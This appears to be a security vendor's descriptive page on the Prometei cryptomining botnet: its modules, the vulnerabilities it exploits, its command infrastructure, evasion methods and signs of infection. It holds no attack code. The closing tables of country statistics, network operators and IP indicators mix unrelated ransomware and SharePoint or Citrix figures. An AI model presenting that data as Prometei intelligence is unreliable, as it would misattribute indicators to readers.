Prometei Malware - SparTech Software

Prometei is a sophisticated, modular malware family that operates as a botnet, primarily targeting both Windows and Linux systems for illicit cryptocurrency mining (focusing on Monero), credential theft, and other malicious activities. First identified in 2020, with evidence of earlier variants dating back to 2016, Prometei has evolved significantly, with its latest versions demonstrating advanced persistence, lateral movement, and evasion capabilities.

Modular Architecture

• Prometei is built from multiple independent modules, each responsible for specific tasks such as brute-forcing credentials, exploiting vulnerabilities, mining cryptocurrency, stealing data, and maintaining command-and-control (C2) communications.
• This design allows the botnet to adapt quickly: individual modules can be updated or replaced without disrupting the overall operation.

Cross-Platform Targeting

• Early versions focused on Windows, but since late 2020, Linux variants have become prominent, especially in recent campaigns.
• The malware is distributed as 64-bit ELF binaries for Linux and PE files for Windows, often packed with tools like UPX to evade detection.

Propagation and Infection Methods

• Prometei spreads by exploiting well-known vulnerabilities, including:
• EternalBlue (SMB protocol exploit)
• BlueKeep (RDP vulnerability)
• Microsoft Exchange vulnerabilities (e.g., ProxyLogon, ProxyNotShell).
• It also uses brute-force attacks against RDP, SMB, and SSH services to gain initial access.

Command-and-Control (C2) Infrastructure

• Relies on a Domain Generation Algorithm (DGA) to dynamically generate domains for C2 communication, making it resilient against domain takedowns.
• Maintains persistence via scheduled tasks, services, and web shells (e.g., Apache with PHP web shell).

Self-Updating and Evasion

• Prometei can self-update its modules, allowing it to adapt to new security measures and evade detection.
• Uses obfuscation techniques, such as compressing payloads and encoding commands in Base64.

Symptoms of Infection

• Noticeable system slowdowns and overheating
• Unexpectedly high electricity bills (due to mining)
• Unrecognized processes or services running
• Persistent high network activity
• Rapid battery drain on laptops

Synonyms:

Prometei Botnet, Prometei

Researchers are noticing a resurgence of the Prometei botnet, evolving the threat to further target Linux.
The Prometei botnet has experienced a notable resurgence in 2025, particularly with its Linux variant, marking it as a persistent and evolving threat to organizations worldwide. Originally discovered in July 2020 primarily targeting Windows systems, Prometei expanded to Linux in December 2020 and has since continued to evolve both in scope and technical sophistication.

United States	~59% of ransomware attacks globally Thousands per year
Poland	1,000+ per week
Russia	Highest cybercrime threat level
China	Thousands per year
India	115% surge in attacks Q2 2024
Ukraine	Significant surge since 2022
Brazil	Among top countries for blocked attacks
Mexico	65% of businesses hit in 2024
Germany	High targeted rate (EU)
France	High targeted rate (EU)

AS Name	ASN
Bharat Sanchar Nigam Ltd	9829
No.31,Jin-rong Street	4134
CHINA UNICOM China169 Backbone	4837
DigitalOcean, LLC	14061
HUAWEI INTERNATIONAL PTE. LTD.	136907
Amazon.com, Inc.	14618
Alibaba (US) Technology Co., Ltd.	45102
Google LLC	396982
Amazon.com, Inc.	16509
3xK Tech GmbH	200373

IP Address	Notable Exploits/Context
104.238.159.149	SharePoint zero-day, broad exploitation
107.191.58.76	SharePoint zero-day, government targets
96.9.125.147	SharePoint, previously Ivanti exploits
139.162.47.194	Exploits on CitrixBleed 2
38.180.148.215	CitrixBleed 2 campaigns
185.224.128.17	High activity, Netherlands
89.248.163.200	High activity, Netherlands
15.235.218.150	Associated with APT, active C2
45.9.148.114	Associated with C2, malicious netflow
91.107.150.184	C2 infrastructure, recent IoC